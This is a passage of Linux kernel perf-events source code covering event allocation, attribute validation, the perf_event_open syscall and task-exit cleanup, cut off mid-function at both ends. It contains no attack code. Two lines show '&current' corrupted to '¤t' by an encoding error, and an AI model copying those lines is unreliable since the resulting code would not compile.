remove_device = pmu_bus_running;
list_del_rcu(&pmu->entry);
mutex_unlock(&pmus_lock);
/*
* We dereference the pmu list under both SRCU and regular RCU, so
* synchronize against both of those.
*/
synchronize_srcu(&pmus_srcu);
synchronize_rcu();
free_percpu(pmu->pmu_disable_count);
if (pmu->type >= PERF_TYPE_MAX)
idr_remove(&pmu_idr, pmu->type);
if (remove_device) {
if (pmu->nr_addr_filters)
device_remove_file(pmu->dev, &dev_attr_nr_addr_filters);
device_del(pmu->dev);
put_device(pmu->dev);
}
free_pmu_context(pmu);
}
EXPORT_SYMBOL_GPL(perf_pmu_unregister);
static int perf_try_init_event(struct pmu *pmu, struct perf_event *event)
{
struct perf_event_context *ctx = NULL;
int ret;
if (!try_module_get(pmu->module))
return -ENODEV;
if (event->group_leader != event) {
/*
* This ctx->mutex can nest when we're called through
* inheritance. See the perf_event_ctx_lock_nested() comment.
*/
ctx = perf_event_ctx_lock_nested(event->group_leader,
SINGLE_DEPTH_NESTING);
BUG_ON(!ctx);
}
event->pmu = pmu;
ret = pmu->event_init(event);
if (ctx)
perf_event_ctx_unlock(event->group_leader, ctx);
if (ret)
module_put(pmu->module);
return ret;
}
static struct pmu *perf_init_event(struct perf_event *event)
{
struct pmu *pmu = NULL;
int idx;
int ret;
idx = srcu_read_lock(&pmus_srcu);
/* Try parent's PMU first: */
if (event->parent && event->parent->pmu) {
pmu = event->parent->pmu;
ret = perf_try_init_event(pmu, event);
if (!ret)
goto unlock;
}
rcu_read_lock();
pmu = idr_find(&pmu_idr, event->attr.type);
rcu_read_unlock();
if (pmu) {
ret = perf_try_init_event(pmu, event);
if (ret)
pmu = ERR_PTR(ret);
goto unlock;
}
list_for_each_entry_rcu(pmu, &pmus, entry) {
ret = perf_try_init_event(pmu, event);
if (!ret)
goto unlock;
if (ret != -ENOENT) {
pmu = ERR_PTR(ret);
goto unlock;
}
}
pmu = ERR_PTR(-ENOENT);
unlock:
srcu_read_unlock(&pmus_srcu, idx);
return pmu;
}
static void attach_sb_event(struct perf_event *event)
{
struct pmu_event_list *pel = per_cpu_ptr(&pmu_sb_events, event->cpu);
raw_spin_lock(&pel->lock);
list_add_rcu(&event->sb_list, &pel->list);
raw_spin_unlock(&pel->lock);
}
/*
* We keep a list of all !task (and therefore per-cpu) events
* that need to receive side-band records.
*
* This avoids having to scan all the various PMU per-cpu contexts
* looking for them.
*/
static void account_pmu_sb_event(struct perf_event *event)
{
if (is_sb_event(event))
attach_sb_event(event);
}
static void account_event_cpu(struct perf_event *event, int cpu)
{
if (event->parent)
return;
if (is_cgroup_event(event))
atomic_inc(&per_cpu(perf_cgroup_events, cpu));
}
/* Freq events need the tick to stay alive (see perf_event_task_tick). */
static void account_freq_event_nohz(void)
{
#ifdef CONFIG_NO_HZ_FULL
/* Lock so we don't race with concurrent unaccount */
spin_lock(&nr_freq_lock);
if (atomic_inc_return(&nr_freq_events) == 1)
tick_nohz_dep_set(TICK_DEP_BIT_PERF_EVENTS);
spin_unlock(&nr_freq_lock);
#endif
}
static void account_freq_event(void)
{
if (tick_nohz_full_enabled())
account_freq_event_nohz();
else
atomic_inc(&nr_freq_events);
}
static void account_event(struct perf_event *event)
{
bool inc = false;
if (event->parent)
return;
if (event->attach_state & PERF_ATTACH_TASK)
inc = true;
if (event->attr.mmap || event->attr.mmap_data)
atomic_inc(&nr_mmap_events);
if (event->attr.comm)
atomic_inc(&nr_comm_events);
if (event->attr.task)
atomic_inc(&nr_task_events);
if (event->attr.freq)
account_freq_event();
if (event->attr.context_switch) {
atomic_inc(&nr_switch_events);
inc = true;
}
if (has_branch_stack(event))
inc = true;
if (is_cgroup_event(event))
inc = true;
if (inc) {
if (atomic_inc_not_zero(&perf_sched_count))
goto enabled;
mutex_lock(&perf_sched_mutex);
if (!atomic_read(&perf_sched_count)) {
static_branch_enable(&perf_sched_events);
/*
* Guarantee that all CPUs observe they key change and
* call the perf scheduling hooks before proceeding to
* install events that need them.
*/
synchronize_sched();
}
/*
* Now that we have waited for the sync_sched(), allow further
* increments to by-pass the mutex.
*/
atomic_inc(&perf_sched_count);
mutex_unlock(&perf_sched_mutex);
}
enabled:
account_event_cpu(event, event->cpu);
account_pmu_sb_event(event);
}
/*
* Allocate and initialize a event structure
*/
static struct perf_event *
perf_event_alloc(struct perf_event_attr *attr, int cpu,
struct task_struct *task,
struct perf_event *group_leader,
struct perf_event *parent_event,
perf_overflow_handler_t overflow_handler,
void *context, int cgroup_fd)
{
struct pmu *pmu;
struct perf_event *event;
struct hw_perf_event *hwc;
long err = -EINVAL;
if ((unsigned)cpu >= nr_cpu_ids) {
if (!task || cpu != -1)
return ERR_PTR(-EINVAL);
}
event = kzalloc(sizeof(*event), GFP_KERNEL);
if (!event)
return ERR_PTR(-ENOMEM);
/*
* Single events are their own group leaders, with an
* empty sibling list:
*/
if (!group_leader)
group_leader = event;
mutex_init(&event->child_mutex);
INIT_LIST_HEAD(&event->child_list);
INIT_LIST_HEAD(&event->group_entry);
INIT_LIST_HEAD(&event->event_entry);
INIT_LIST_HEAD(&event->sibling_list);
INIT_LIST_HEAD(&event->rb_entry);
INIT_LIST_HEAD(&event->active_entry);
INIT_LIST_HEAD(&event->addr_filters.list);
INIT_HLIST_NODE(&event->hlist_entry);
init_waitqueue_head(&event->waitq);
init_irq_work(&event->pending, perf_pending_event);
mutex_init(&event->mmap_mutex);
raw_spin_lock_init(&event->addr_filters.lock);
atomic_long_set(&event->refcount, 1);
event->cpu = cpu;
event->attr = *attr;
event->group_leader = group_leader;
event->pmu = NULL;
event->oncpu = -1;
event->parent = parent_event;
event->ns = get_pid_ns(task_active_pid_ns(current));
event->id = atomic64_inc_return(&perf_event_id);
event->state = PERF_EVENT_STATE_INACTIVE;
if (task) {
event->attach_state = PERF_ATTACH_TASK;
/*
* XXX pmu::event_init needs to know what task to account to
* and we cannot use the ctx information because we need the
* pmu before we get a ctx.
*/
event->hw.target = task;
}
event->clock = &local_clock;
if (parent_event)
event->clock = parent_event->clock;
if (!overflow_handler && parent_event) {
overflow_handler = parent_event->overflow_handler;
context = parent_event->overflow_handler_context;
#if defined(CONFIG_BPF_SYSCALL) && defined(CONFIG_EVENT_TRACING)
if (overflow_handler == bpf_overflow_handler) {
struct bpf_prog *prog = bpf_prog_inc(parent_event->prog);
if (IS_ERR(prog)) {
err = PTR_ERR(prog);
goto err_ns;
}
event->prog = prog;
event->orig_overflow_handler =
parent_event->orig_overflow_handler;
}
#endif
}
if (overflow_handler) {
event->overflow_handler = overflow_handler;
event->overflow_handler_context = context;
} else if (is_write_backward(event)){
event->overflow_handler = perf_event_output_backward;
event->overflow_handler_context = NULL;
} else {
event->overflow_handler = perf_event_output_forward;
event->overflow_handler_context = NULL;
}
perf_event__state_init(event);
pmu = NULL;
hwc = &event->hw;
hwc->sample_period = attr->sample_period;
if (attr->freq && attr->sample_freq)
hwc->sample_period = 1;
hwc->last_period = hwc->sample_period;
local64_set(&hwc->period_left, hwc->sample_period);
/*
* we currently do not support PERF_FORMAT_GROUP on inherited events
*/
if (attr->inherit && (attr->read_format & PERF_FORMAT_GROUP))
goto err_ns;
if (!has_branch_stack(event))
event->attr.branch_sample_type = 0;
if (cgroup_fd != -1) {
err = perf_cgroup_connect(cgroup_fd, event, attr, group_leader);
if (err)
goto err_ns;
}
pmu = perf_init_event(event);
if (!pmu)
goto err_ns;
else if (IS_ERR(pmu)) {
err = PTR_ERR(pmu);
goto err_ns;
}
err = exclusive_event_init(event);
if (err)
goto err_pmu;
if (has_addr_filter(event)) {
event->addr_filters_offs = kcalloc(pmu->nr_addr_filters,
sizeof(unsigned long),
GFP_KERNEL);
if (!event->addr_filters_offs)
goto err_per_task;
/* force hw sync on the address filters */
event->addr_filters_gen = 1;
}
if (!event->parent) {
if (event->attr.sample_type & PERF_SAMPLE_CALLCHAIN) {
err = get_callchain_buffers(attr->sample_max_stack);
if (err)
goto err_addr_filters;
}
}
/* symmetric to unaccount_event() in _free_event() */
account_event(event);
return event;
err_addr_filters:
kfree(event->addr_filters_offs);
err_per_task:
exclusive_event_destroy(event);
err_pmu:
if (event->destroy)
event->destroy(event);
module_put(pmu->module);
err_ns:
if (is_cgroup_event(event))
perf_detach_cgroup(event);
if (event->ns)
put_pid_ns(event->ns);
kfree(event);
return ERR_PTR(err);
}
static int perf_copy_attr(struct perf_event_attr __user *uattr,
struct perf_event_attr *attr)
{
u32 size;
int ret;
if (!access_ok(VERIFY_WRITE, uattr, PERF_ATTR_SIZE_VER0))
return -EFAULT;
/*
* zero the full structure, so that a short copy will be nice.
*/
memset(attr, 0, sizeof(*attr));
ret = get_user(size, &uattr->size);
if (ret)
return ret;
if (size > PAGE_SIZE) /* silly large */
goto err_size;
if (!size) /* abi compat */
size = PERF_ATTR_SIZE_VER0;
if (size < PERF_ATTR_SIZE_VER0)
goto err_size;
/*
* If we're handed a bigger struct than we know of,
* ensure all the unknown bits are 0 - i.e. new
* user-space does not rely on any kernel feature
* extensions we dont know about yet.
*/
if (size > sizeof(*attr)) {
unsigned char __user *addr;
unsigned char __user *end;
unsigned char val;
addr = (void __user *)uattr + sizeof(*attr);
end = (void __user *)uattr + size;
for (; addr < end; addr++) {
ret = get_user(val, addr);
if (ret)
return ret;
if (val)
goto err_size;
}
size = sizeof(*attr);
}
ret = copy_from_user(attr, uattr, size);
if (ret)
return -EFAULT;
if (attr->__reserved_1)
return -EINVAL;
if (attr->sample_type & ~(PERF_SAMPLE_MAX-1))
return -EINVAL;
if (attr->read_format & ~(PERF_FORMAT_MAX-1))
return -EINVAL;
if (attr->sample_type & PERF_SAMPLE_BRANCH_STACK) {
u64 mask = attr->branch_sample_type;
/* only using defined bits */
if (mask & ~(PERF_SAMPLE_BRANCH_MAX-1))
return -EINVAL;
/* at least one branch bit must be set */
if (!(mask & ~PERF_SAMPLE_BRANCH_PLM_ALL))
return -EINVAL;
/* propagate priv level, when not set for branch */
if (!(mask & PERF_SAMPLE_BRANCH_PLM_ALL)) {
/* exclude_kernel checked on syscall entry */
if (!attr->exclude_kernel)
mask |= PERF_SAMPLE_BRANCH_KERNEL;
if (!attr->exclude_user)
mask |= PERF_SAMPLE_BRANCH_USER;
if (!attr->exclude_hv)
mask |= PERF_SAMPLE_BRANCH_HV;
/*
* adjust user setting (for HW filter setup)
*/
attr->branch_sample_type = mask;
}
/* privileged levels capture (kernel, hv): check permissions */
if ((mask & PERF_SAMPLE_BRANCH_PERM_PLM)
&& perf_paranoid_kernel() && !capable(CAP_SYS_ADMIN))
return -EACCES;
}
if (attr->sample_type & PERF_SAMPLE_REGS_USER) {
ret = perf_reg_validate(attr->sample_regs_user);
if (ret)
return ret;
}
if (attr->sample_type & PERF_SAMPLE_STACK_USER) {
if (!arch_perf_have_user_stack_dump())
return -ENOSYS;
/*
* We have __u32 type for the size, but so far
* we can only use __u16 as maximum due to the
* __u16 sample size limit.
*/
if (attr->sample_stack_user >= USHRT_MAX)
ret = -EINVAL;
else if (!IS_ALIGNED(attr->sample_stack_user, sizeof(u64)))
ret = -EINVAL;
}
if (attr->sample_type & PERF_SAMPLE_REGS_INTR)
ret = perf_reg_validate(attr->sample_regs_intr);
out:
return ret;
err_size:
put_user(sizeof(*attr), &uattr->size);
ret = -E2BIG;
goto out;
}
static int
perf_event_set_output(struct perf_event *event, struct perf_event *output_event)
{
struct ring_buffer *rb = NULL;
int ret = -EINVAL;
if (!output_event)
goto set;
/* don't allow circular references */
if (event == output_event)
goto out;
/*
* Don't allow cross-cpu buffers
*/
if (output_event->cpu != event->cpu)
goto out;
/*
* If its not a per-cpu rb, it must be the same task.
*/
if (output_event->cpu == -1 && output_event->ctx != event->ctx)
goto out;
/*
* Mixing clocks in the same buffer is trouble you don't need.
*/
if (output_event->clock != event->clock)
goto out;
/*
* Either writing ring buffer from beginning or from end.
* Mixing is not allowed.
*/
if (is_write_backward(output_event) != is_write_backward(event))
goto out;
/*
* If both events generate aux data, they must be on the same PMU
*/
if (has_aux(event) && has_aux(output_event) &&
event->pmu != output_event->pmu)
goto out;
set:
mutex_lock(&event->mmap_mutex);
/* Can't redirect output if we've got an active mmap() */
if (atomic_read(&event->mmap_count))
goto unlock;
if (output_event) {
/* get the rb we want to redirect to */
rb = ring_buffer_get(output_event);
if (!rb)
goto unlock;
}
ring_buffer_attach(event, rb);
ret = 0;
unlock:
mutex_unlock(&event->mmap_mutex);
out:
return ret;
}
static void mutex_lock_double(struct mutex *a, struct mutex *b)
{
if (b < a)
swap(a, b);
mutex_lock(a);
mutex_lock_nested(b, SINGLE_DEPTH_NESTING);
}
static int perf_event_set_clock(struct perf_event *event, clockid_t clk_id)
{
bool nmi_safe = false;
switch (clk_id) {
case CLOCK_MONOTONIC:
event->clock = &ktime_get_mono_fast_ns;
nmi_safe = true;
break;
case CLOCK_MONOTONIC_RAW:
event->clock = &ktime_get_raw_fast_ns;
nmi_safe = true;
break;
case CLOCK_REALTIME:
event->clock = &ktime_get_real_ns;
break;
case CLOCK_BOOTTIME:
event->clock = &ktime_get_boot_ns;
break;
case CLOCK_TAI:
event->clock = &ktime_get_tai_ns;
break;
default:
return -EINVAL;
}
if (!nmi_safe && !(event->pmu->capabilities & PERF_PMU_CAP_NO_NMI))
return -EINVAL;
return 0;
}
/*
* Variation on perf_event_ctx_lock_nested(), except we take two context
* mutexes.
*/
static struct perf_event_context *
__perf_event_ctx_lock_double(struct perf_event *group_leader,
struct perf_event_context *ctx)
{
struct perf_event_context *gctx;
again:
rcu_read_lock();
gctx = READ_ONCE(group_leader->ctx);
if (!atomic_inc_not_zero(&gctx->refcount)) {
rcu_read_unlock();
goto again;
}
rcu_read_unlock();
mutex_lock_double(&gctx->mutex, &ctx->mutex);
if (group_leader->ctx != gctx) {
mutex_unlock(&ctx->mutex);
mutex_unlock(&gctx->mutex);
put_ctx(gctx);
goto again;
}
return gctx;
}
/**
* sys_perf_event_open - open a performance event, associate it to a task/cpu
*
* @attr_uptr: event_id type attributes for monitoring/sampling
* @pid: target pid
* @cpu: target cpu
* @group_fd: group leader event fd
*/
SYSCALL_DEFINE5(perf_event_open,
struct perf_event_attr __user *, attr_uptr,
pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
{
struct perf_event *group_leader = NULL, *output_event = NULL;
struct perf_event *event, *sibling;
struct perf_event_attr attr;
struct perf_event_context *ctx, *uninitialized_var(gctx);
struct file *event_file = NULL;
struct fd group = {NULL, 0};
struct task_struct *task = NULL;
struct pmu *pmu;
int event_fd;
int move_group = 0;
int err;
int f_flags = O_RDWR;
int cgroup_fd = -1;
/* for future expandability... */
if (flags & ~PERF_FLAG_ALL)
return -EINVAL;
err = perf_copy_attr(attr_uptr, &attr);
if (err)
return err;
if (!attr.exclude_kernel) {
if (perf_paranoid_kernel() && !capable(CAP_SYS_ADMIN))
return -EACCES;
}
if (attr.freq) {
if (attr.sample_freq > sysctl_perf_event_sample_rate)
return -EINVAL;
} else {
if (attr.sample_period & (1ULL << 63))
return -EINVAL;
}
if (!attr.sample_max_stack)
attr.sample_max_stack = sysctl_perf_event_max_stack;
/*
* In cgroup mode, the pid argument is used to pass the fd
* opened to the cgroup directory in cgroupfs. The cpu argument
* designates the cpu on which to monitor threads from that
* cgroup.
*/
if ((flags & PERF_FLAG_PID_CGROUP) && (pid == -1 || cpu == -1))
return -EINVAL;
if (flags & PERF_FLAG_FD_CLOEXEC)
f_flags |= O_CLOEXEC;
event_fd = get_unused_fd_flags(f_flags);
if (event_fd < 0)
return event_fd;
if (group_fd != -1) {
err = perf_fget_light(group_fd, &group);
if (err)
goto err_fd;
group_leader = group.file->private_data;
if (flags & PERF_FLAG_FD_OUTPUT)
output_event = group_leader;
if (flags & PERF_FLAG_FD_NO_GROUP)
group_leader = NULL;
}
if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) {
task = find_lively_task_by_vpid(pid);
if (IS_ERR(task)) {
err = PTR_ERR(task);
goto err_group_fd;
}
}
if (task && group_leader &&
group_leader->attr.inherit != attr.inherit) {
err = -EINVAL;
goto err_task;
}
get_online_cpus();
if (task) {
err = mutex_lock_interruptible(&task->signal->cred_guard_mutex);
if (err)
goto err_cpus;
/*
* Reuse ptrace permission checks for now.
*
* We must hold cred_guard_mutex across this and any potential
* perf_install_in_context() call for this new event to
* serialize against exec() altering our credentials (and the
* perf_event_exit_task() that could imply).
*/
err = -EACCES;
if (!ptrace_may_access(task, PTRACE_MODE_READ_REALCREDS))
goto err_cred;
}
if (flags & PERF_FLAG_PID_CGROUP)
cgroup_fd = pid;
event = perf_event_alloc(&attr, cpu, task, group_leader, NULL,
NULL, NULL, cgroup_fd);
if (IS_ERR(event)) {
err = PTR_ERR(event);
goto err_cred;
}
if (is_sampling_event(event)) {
if (event->pmu->capabilities & PERF_PMU_CAP_NO_INTERRUPT) {
err = -EOPNOTSUPP;
goto err_alloc;
}
}
/*
* Special case software events and allow them to be part of
* any hardware group.
*/
pmu = event->pmu;
if (attr.use_clockid) {
err = perf_event_set_clock(event, attr.clockid);
if (err)
goto err_alloc;
}
if (pmu->task_ctx_nr == perf_sw_context)
event->event_caps |= PERF_EV_CAP_SOFTWARE;
if (group_leader &&
(is_software_event(event) != is_software_event(group_leader))) {
if (is_software_event(event)) {
/*
* If event and group_leader are not both a software
* event, and event is, then group leader is not.
*
* Allow the addition of software events to !software
* groups, this is safe because software events never
* fail to schedule.
*/
pmu = group_leader->pmu;
} else if (is_software_event(group_leader) &&
(group_leader->group_caps & PERF_EV_CAP_SOFTWARE)) {
/*
* In case the group is a pure software group, and we
* try to add a hardware event, move the whole group to
* the hardware context.
*/
move_group = 1;
}
}
/*
* Get the target context (task or percpu):
*/
ctx = find_get_context(pmu, task, event);
if (IS_ERR(ctx)) {
err = PTR_ERR(ctx);
goto err_alloc;
}
if ((pmu->capabilities & PERF_PMU_CAP_EXCLUSIVE) && group_leader) {
err = -EBUSY;
goto err_context;
}
/*
* Look up the group leader (we will attach this event to it):
*/
if (group_leader) {
err = -EINVAL;
/*
* Do not allow a recursive hierarchy (this new sibling
* becoming part of another group-sibling):
*/
if (group_leader->group_leader != group_leader)
goto err_context;
/* All events in a group should have the same clock */
if (group_leader->clock != event->clock)
goto err_context;
/*
* Do not allow to attach to a group in a different
* task or CPU context:
*/
if (move_group) {
/*
* Make sure we're both on the same task, or both
* per-cpu events.
*/
if (group_leader->ctx->task != ctx->task)
goto err_context;
/*
* Make sure we're both events for the same CPU;
* grouping events for different CPUs is broken; since
* you can never concurrently schedule them anyhow.
*/
if (group_leader->cpu != event->cpu)
goto err_context;
} else {
if (group_leader->ctx != ctx)
goto err_context;
}
/*
* Only a group leader can be exclusive or pinned
*/
if (attr.exclusive || attr.pinned)
goto err_context;
}
if (output_event) {
err = perf_event_set_output(event, output_event);
if (err)
goto err_context;
}
event_file = anon_inode_getfile("[perf_event]", &perf_fops, event,
f_flags);
if (IS_ERR(event_file)) {
err = PTR_ERR(event_file);
event_file = NULL;
goto err_context;
}
if (move_group) {
gctx = __perf_event_ctx_lock_double(group_leader, ctx);
if (gctx->task == TASK_TOMBSTONE) {
err = -ESRCH;
goto err_locked;
}
/*
* Check if we raced against another sys_perf_event_open() call
* moving the software group underneath us.
*/
if (!(group_leader->group_caps & PERF_EV_CAP_SOFTWARE)) {
/*
* If someone moved the group out from under us, check
* if this new event wound up on the same ctx, if so
* its the regular !move_group case, otherwise fail.
*/
if (gctx != ctx) {
err = -EINVAL;
goto err_locked;
} else {
perf_event_ctx_unlock(group_leader, gctx);
move_group = 0;
}
}
} else {
mutex_lock(&ctx->mutex);
}
if (ctx->task == TASK_TOMBSTONE) {
err = -ESRCH;
goto err_locked;
}
if (!perf_event_validate_size(event)) {
err = -E2BIG;
goto err_locked;
}
/*
* Must be under the same ctx::mutex as perf_install_in_context(),
* because we need to serialize with concurrent event creation.
*/
if (!exclusive_event_installable(event, ctx)) {
/* exclusive and group stuff are assumed mutually exclusive */
WARN_ON_ONCE(move_group);
err = -EBUSY;
goto err_locked;
}
WARN_ON_ONCE(ctx->parent_ctx);
/*
* This is the point on no return; we cannot fail hereafter. This is
* where we start modifying current state.
*/
if (move_group) {
/*
* See perf_event_ctx_lock() for comments on the details
* of swizzling perf_event::ctx.
*/
perf_remove_from_context(group_leader, 0);
put_ctx(gctx);
list_for_each_entry(sibling, &group_leader->sibling_list,
group_entry) {
perf_remove_from_context(sibling, 0);
put_ctx(gctx);
}
/*
* Wait for everybody to stop referencing the events through
* the old lists, before installing it on new lists.
*/
synchronize_rcu();
/*
* Install the group siblings before the group leader.
*
* Because a group leader will try and install the entire group
* (through the sibling list, which is still in-tact), we can
* end up with siblings installed in the wrong context.
*
* By installing siblings first we NO-OP because they're not
* reachable through the group lists.
*/
list_for_each_entry(sibling, &group_leader->sibling_list,
group_entry) {
perf_event__state_init(sibling);
perf_install_in_context(ctx, sibling, sibling->cpu);
get_ctx(ctx);
}
/*
* Removing from the context ends up with disabled
* event. What we want here is event in the initial
* startup state, ready to be add into new context.
*/
perf_event__state_init(group_leader);
perf_install_in_context(ctx, group_leader, group_leader->cpu);
get_ctx(ctx);
}
/*
* Precalculate sample_data sizes; do while holding ctx::mutex such
* that we're serialized against further additions and before
* perf_install_in_context() which is the point the event is active and
* can use these values.
*/
perf_event__header_size(event);
perf_event__id_header_size(event);
event->owner = current;
perf_install_in_context(ctx, event, event->cpu);
perf_unpin_context(ctx);
if (move_group)
perf_event_ctx_unlock(group_leader, gctx);
mutex_unlock(&ctx->mutex);
if (task) {
mutex_unlock(&task->signal->cred_guard_mutex);
put_task_struct(task);
}
put_online_cpus();
mutex_lock(¤t->perf_event_mutex);
list_add_tail(&event->owner_entry, ¤t->perf_event_list);
mutex_unlock(¤t->perf_event_mutex);
/*
* Drop the reference on the group_event after placing the
* new event on the sibling_list. This ensures destruction
* of the group leader will find the pointer to itself in
* perf_group_detach().
*/
fdput(group);
fd_install(event_fd, event_file);
return event_fd;
err_locked:
if (move_group)
perf_event_ctx_unlock(group_leader, gctx);
mutex_unlock(&ctx->mutex);
/* err_file: */
fput(event_file);
err_context:
perf_unpin_context(ctx);
put_ctx(ctx);
err_alloc:
/*
* If event_file is set, the fput() above will have called ->release()
* and that will take care of freeing the event.
*/
if (!event_file)
free_event(event);
err_cred:
if (task)
mutex_unlock(&task->signal->cred_guard_mutex);
err_cpus:
put_online_cpus();
err_task:
if (task)
put_task_struct(task);
err_group_fd:
fdput(group);
err_fd:
put_unused_fd(event_fd);
return err;
}
/**
* perf_event_create_kernel_counter
*
* @attr: attributes of the counter to create
* @cpu: cpu in which the counter is bound
* @task: task to profile (NULL for percpu)
*/
struct perf_event *
perf_event_create_kernel_counter(struct perf_event_attr *attr, int cpu,
struct task_struct *task,
perf_overflow_handler_t overflow_handler,
void *context)
{
struct perf_event_context *ctx;
struct perf_event *event;
int err;
/*
* Get the target context (task or percpu):
*/
event = perf_event_alloc(attr, cpu, task, NULL, NULL,
overflow_handler, context, -1);
if (IS_ERR(event)) {
err = PTR_ERR(event);
goto err;
}
/* Mark owner so we could distinguish it from user events. */
event->owner = TASK_TOMBSTONE;
ctx = find_get_context(event->pmu, task, event);
if (IS_ERR(ctx)) {
err = PTR_ERR(ctx);
goto err_free;
}
WARN_ON_ONCE(ctx->parent_ctx);
mutex_lock(&ctx->mutex);
if (ctx->task == TASK_TOMBSTONE) {
err = -ESRCH;
goto err_unlock;
}
if (!exclusive_event_installable(event, ctx)) {
err = -EBUSY;
goto err_unlock;
}
perf_install_in_context(ctx, event, cpu);
perf_unpin_context(ctx);
mutex_unlock(&ctx->mutex);
return event;
err_unlock:
mutex_unlock(&ctx->mutex);
perf_unpin_context(ctx);
put_ctx(ctx);
err_free:
free_event(event);
err:
return ERR_PTR(err);
}
EXPORT_SYMBOL_GPL(perf_event_create_kernel_counter);
void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
{
struct perf_event_context *src_ctx;
struct perf_event_context *dst_ctx;
struct perf_event *event, *tmp;
LIST_HEAD(events);
src_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, src_cpu)->ctx;
dst_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, dst_cpu)->ctx;
/*
* See perf_event_ctx_lock() for comments on the details
* of swizzling perf_event::ctx.
*/
mutex_lock_double(&src_ctx->mutex, &dst_ctx->mutex);
list_for_each_entry_safe(event, tmp, &src_ctx->event_list,
event_entry) {
perf_remove_from_context(event, 0);
unaccount_event_cpu(event, src_cpu);
put_ctx(src_ctx);
list_add(&event->migrate_entry, &events);
}
/*
* Wait for the events to quiesce before re-instating them.
*/
synchronize_rcu();
/*
* Re-instate events in 2 passes.
*
* Skip over group leaders and only install siblings on this first
* pass, siblings will not get enabled without a leader, however a
* leader will enable its siblings, even if those are still on the old
* context.
*/
list_for_each_entry_safe(event, tmp, &events, migrate_entry) {
if (event->group_leader == event)
continue;
list_del(&event->migrate_entry);
if (event->state >= PERF_EVENT_STATE_OFF)
event->state = PERF_EVENT_STATE_INACTIVE;
account_event_cpu(event, dst_cpu);
perf_install_in_context(dst_ctx, event, dst_cpu);
get_ctx(dst_ctx);
}
/*
* Once all the siblings are setup properly, install the group leaders
* to make it go.
*/
list_for_each_entry_safe(event, tmp, &events, migrate_entry) {
list_del(&event->migrate_entry);
if (event->state >= PERF_EVENT_STATE_OFF)
event->state = PERF_EVENT_STATE_INACTIVE;
account_event_cpu(event, dst_cpu);
perf_install_in_context(dst_ctx, event, dst_cpu);
get_ctx(dst_ctx);
}
mutex_unlock(&dst_ctx->mutex);
mutex_unlock(&src_ctx->mutex);
}
EXPORT_SYMBOL_GPL(perf_pmu_migrate_context);
static void sync_child_event(struct perf_event *child_event,
struct task_struct *child)
{
struct perf_event *parent_event = child_event->parent;
u64 child_val;
if (child_event->attr.inherit_stat)
perf_event_read_event(child_event, child);
child_val = perf_event_count(child_event);
/*
* Add back the child's count to the parent's count:
*/
atomic64_add(child_val, &parent_event->child_count);
atomic64_add(child_event->total_time_enabled,
&parent_event->child_total_time_enabled);
atomic64_add(child_event->total_time_running,
&parent_event->child_total_time_running);
}
static void
perf_event_exit_event(struct perf_event *child_event,
struct perf_event_context *child_ctx,
struct task_struct *child)
{
struct perf_event *parent_event = child_event->parent;
/*
* Do not destroy the 'original' grouping; because of the context
* switch optimization the original events could've ended up in a
* random child task.
*
* If we were to destroy the original group, all group related
* operations would cease to function properly after this random
* child dies.
*
* Do destroy all inherited groups, we don't care about those
* and being thorough is better.
*/
raw_spin_lock_irq(&child_ctx->lock);
WARN_ON_ONCE(child_ctx->is_active);
if (parent_event)
perf_group_detach(child_event);
list_del_event(child_event, child_ctx);
child_event->state = PERF_EVENT_STATE_EXIT; /* is_event_hup() */
raw_spin_unlock_irq(&child_ctx->lock);
/*
* Parent events are governed by their filedesc, retain them.
*/
if (!parent_event) {
perf_event_wakeup(child_event);
return;
}
/*
* Child events can be cleaned up.
*/
sync_child_event(child_event, child);
/*
* Remove this event from the parent's list
*/
WARN_ON_ONCE(parent_event->ctx->parent_ctx);
mutex_lock(&parent_event->child_mutex);
list_del_init(&child_event->child_list);
mutex_unlock(&parent_event->child_mutex);
/*
* Kick perf_poll() for is_event_hup().
*/
perf_event_wakeup(parent_event);
free_event(child_event);
put_event(parent_event);
}
static void perf_event_exit_task_context(struct task_struct *child, int ctxn)
{
struct perf_event_context *child_ctx, *clone_ctx = NULL;
struct perf_event *child_event, *next;
WARN_ON_ONCE(child != current);
child_ctx = perf_pin_task_context(child, ctxn);
if (!child_ctx)
return;
/*
* In order to reduce the amount of tricky in ctx tear-down, we hold
* ctx::mutex over the entire thing. This serializes against almost
* everything that wants to access the ctx.
*
* The exception is sys_perf_event_open() /
* perf_event_create_kernel_count() which does find_get_context()
* without ctx::mutex (it cannot because of the move_group double mutex
* lock thing). See the comments in perf_install_in_context().
*/
mutex_lock(&child_ctx->mutex);
/*
* In a single ctx::lock section, de-schedule the events and detach the
* context from the task such that we cannot ever get it scheduled back
* in.
*/
raw_spin_lock_irq(&child_ctx->lock);
task_ctx_sched_out(__get_cpu_context(child_ctx), child_ctx, EVENT_ALL);
/*
* Now that the context is inactive, destroy the task <-> ctx relation
* and mark the context dead.
*/
RCU_INIT_POINTER(child->perf_event_ctxp[ctxn], NULL);
put_ctx(child_ctx); /* cannot be last */
WRITE_ONCE(child_ctx->task, TASK_TOMBSTONE);
put_task_struct(current); /* cannot be last */
clone_ctx = unclone_ctx(child_ctx);
raw_spin_unlock_irq(&child_ctx->lock);
if (clone_ctx)
put_ctx(clone_ctx);
/*
* Report the task dead after unscheduling the events so that we
* won't get any samples after PERF_RECORD_EXIT. We can however still
* get a few PERF_RECORD_READ events.
*/
perf_event_task(child, child_ctx, 0);
list_for_each_entry_safe(child_event, next, &child_ctx->event_list, event_entry)
perf_event_exit_event(child_event, child_ctx, child);
mutex_unlock(&child_ctx->mutex);
put_ctx(child_ctx);
}
/*
* When a child task exits, feed back event values to parent events.
*
* Can be called with cred_guard_mutex held when called from
* install_exec_creds().
*/
void perf_event_exit_task(struct task_struct *child)
{
struct perf_event *event, *tmp;
int ctxn;
mutex_lock(&child->perf_event_mutex);
list_for_each_entry_safe(event, tmp, &child->perf_event_list,
owner_entry) {
list_del_init(&event->owner_entry);
/*
* Ensure the list deletion is visible before we clear
* the owner, closes a race against perf_release() where
* we need to serialize on the owner->perf_event_mutex.
*/
smp_store_release(&event->owner, NULL);
}
mutex_unlock(&child->perf_event_mutex);
for_each_task_context_nr(ctxn)
perf_event_exit_task_context(child, ctxn);
/*
* The perf_event_exit_task_context calls perf_event_task
* with child's task_ctx, which generates EXIT events for
* child contexts and sets child->perf_event_ctxp[] to NULL.
* At this point we need to send EXIT events to cpu contexts.
*/
